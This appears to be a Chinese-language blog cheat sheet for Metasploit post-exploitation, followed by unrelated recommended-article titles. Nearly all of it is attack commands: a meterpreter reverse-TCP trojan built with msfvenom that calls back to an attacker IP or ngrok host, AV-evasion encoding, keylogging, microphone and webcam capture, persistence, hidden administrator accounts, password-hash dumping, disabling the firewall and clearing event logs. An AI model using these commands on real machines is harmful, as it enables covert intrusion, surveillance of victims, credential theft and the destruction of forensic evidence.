MSF

链接数据库

linux查找文件
find / -name dabase.yml
链接数据库 db_connect -y path/database.yml
db_status 查询数据库链接状态

payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)

background 后台
sessions -i 1 返回
sessions -l 列出所有session getwd 查看远程主机当前路径
getlwd 查看本地当前路径
search -d c:\\ -f *.doc 查找文件
upload 3.jpg c:\\1.jpg 上传文件
cat test.txt 查看文件
download c:\\phpstudy\\wke.doc /root/wke.doc 下载文件
route 查看路由
getpid 查看当前进程ID
execute -H -f calc.exe 执行文件
shell 开启shell
kill杀死进程
sysinfo 列出系统信息

进程迁移

ps  查看所有正在运行的进程
getuid 获取当前进程的用户
migrate 进程号 迁移进程 explorer.exe为桌面进程

开启键盘

keyscan_start  开启键盘记录 (需要有管理员权限)
keyscan_dump 显示记录的信息
keyscan_stop 关闭键盘记录

录制声音

record-mic -d 10  录制声音10秒

开启摄像头

webcam_list  查看摄像头连接
webcam_chat 开启摄像头
webcam_stop 关闭摄像头
webcam_snap开摄像头截屏
webcam_stream -i 1 -v true

桌面截屏

screenshot  截屏

开启VNC

run  vnc  开启vnc

持久化访问

run metsvc  安装持久化访问
run metsvc -r 卸载安装
另一种方法
run persistence -X -i 5 -p 445 -r ip

创建 隐藏用户

net user hacker$ hacker /add  创建隐藏用户
net localgroup admininistators hacker$ /add 添加用户到管理员组 用getgui创建用户 并分配管理员权限 开启远程桌面
run getgui -u hacker -p hacker

获取凭证(用户名和密码)

run post/windows/gather/hashdump

判断是否为虚拟机

run post/windows/gather/checkvm

获取目标主机最近的操作

run post/windows/gather/dumplinks

获取系统安装程序个补丁

run post/windows/gather/enum_applications

通过shell关闭防火墙

shell
netsh adcfirewall ser allprofiles srate off

开启端口转发

portfwd add -l 1235  -r  10.10.10.129  -p 3389
这样就把远程主机的端口 映射到本机的1235端口

清除日志

 clearev 清除日志

kali链接windows桌面

rdesktop  -u  admin  -p  admin  ip:port

kali命令行与窗口化切换

init 3 命令行  5桌面

msfvenom生成木马

msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost=10.10.10.128   lport=10001 -f exe > /root/config.exe

免杀木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cclport=00000 -f c

-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)

木马的使用

设置tcp监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.128
ser lport 10001
run

远程主机运行木马

windows命令

net  use  查看网络链接
net user admin 123456 /add 添加用户
net user admin 密码
net user admin /del

MSF基本使用的更多相关文章

  1. 免杀后门之MSF&Veil-Evasion的完美结合

    本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装 ...

  2. 用MSF进行提权

    在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. ms ...

  3. 现代软件工程 第七章 【MSF】练习与讨论

    7.7  移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...

  4. [书目20160218]微软软件研发的奥秘:MSF精髓

    目录 第一部分 解决方案交付基础 第1章 什么是MSF,它适合你吗 2 1.1 MSF的历史和起源 2 1.2 为什么是“框架” 3 1.3 MSF有何不同 5 1.4 MSF第四版的要素 5 1.5 ...

  5. msf命令全集

    一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 e ...

  6. MSF溢出实战教程

    1.  进入终端,开启MSF相关服务 2.  连接数据库 3.  主机扫描 发现如果有MS08_067漏洞,就可以继续渗透 4.  开始溢出 溢出成功的话 sessions -l         查看 ...

  7. MSF命令 收集

    一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 e ...

  8. [转]软件开发过程(CMMI/RUP/XP/MSF)是与非?

    经常看到和听到大家在争论敏捷过程.RUP和CMM 哪个软件开发过程更好或者哪个过程不好,各自都有理由.争论得不亦乐乎......实际上,没有十全十美的过程,也不存在更好的过程.关键是什么样的过程适合自 ...

  9. [转]比较 Rational Unified Process (RUP) 和 Microsoft Solutions Framework (MSF)

      文档选项 将此页作为电子邮件发送 级别: 初级 Sandra Sergi Santos, 软件工程专家, IBM 2007 年 6 月 15 日 本文来自于 Rational Edge:Micro ...

  10. BT5之Metasploit[MSF]连接postgresql数据库

    1,先查看postgresql的端口,默认是自动开启的,端口7337 .   root@bt:~# netstat -tnpl |grep postgres tcp        0      0 1 ...

随机推荐

  1. 如何从0到1设计一个类Dubbo的RPC框架

    之前分享了如何从0到1设计一个MQ消息队列,今天谈谈"如何从0到1设计一个Dubbo的RPC框架",重点考验: 你对RPC框架的底层原理掌握程度. 以及考验你的整体RPC框架系统设 ...

  2. Java中类变量(静态变量)和类方法(静态方法)

    类变量 类变量也叫静态变量或静态属性,是该类所有对象共享的变量任何一个该类的对象去访问它时,取得都是一样的值 语法: 访问修饰符  static  数据类型  变量名 static  访问修饰符  数 ...

  3. linux 利用python模块实现格式化json

    非json格式示例 {"name": "chen2ha", "where": {"country": "Chi ...

  4. Python中类的多层继承和多重继承

  5. ASP.NET Core 6框架揭秘实例演示[10]:Options基本编程模式

    依赖注入使我们可以将依赖的功能定义成服务,最终以一种松耦合的形式注入消费该功能的组件或者服务中.除了可以采用依赖注入的形式消费承载某种功能的服务,还可以采用相同的方式消费承载配置数据的Options对 ...

  6. 【C# 集合】Hash哈希函数 |散列函数|摘要算法

    希函数定义 哈希函数(英語:Hash function)又称散列函数.散列函数.摘要算法.单向散列函数.散列函数把消息或数据压缩成摘要,使得数据量变小,将数据的格式固定下来.该函数将数据打乱混合,重新 ...

  7. 【C#程序集】为何.NET Core控制台项目发布后是一个dll文件,而不是exe文件?

    因为 .NET Core 的控制台应用默认是生成 dll 文件,而没有对应的 exe 文件.如下图所示,是在VS中编译后生成的结果 图中看到的TestVisualizer.exe 只是一个快捷方式, ...

  8. Hive数子IP与字符串IP之间的转换

    字符串IP:247.164.62.58  对应的   数字IP:4154736186 数子IP=>字符串IP select concat_ws('.',conv(substr(hex(41547 ...

  9. GNS3与抓包工具Wireshark的关联

    转至:https://blog.51cto.com/xpleaf/1615145 (一)前言 本博文分享GNS3与Wireshark关联的方法. 显然现在网络上已经有类似的文章分享,而本博文旨在提供更 ...

  10. 『无为则无心』Python日志 — 66、将日志信息保存到文件中

    目录 1.把日志信息保存到文件中 2.拓展 (1)观察代码 (2)提出问题 (3)问题说明 1.把日志信息保存到文件中 代码如下所示: """ logging模块是Pyt ...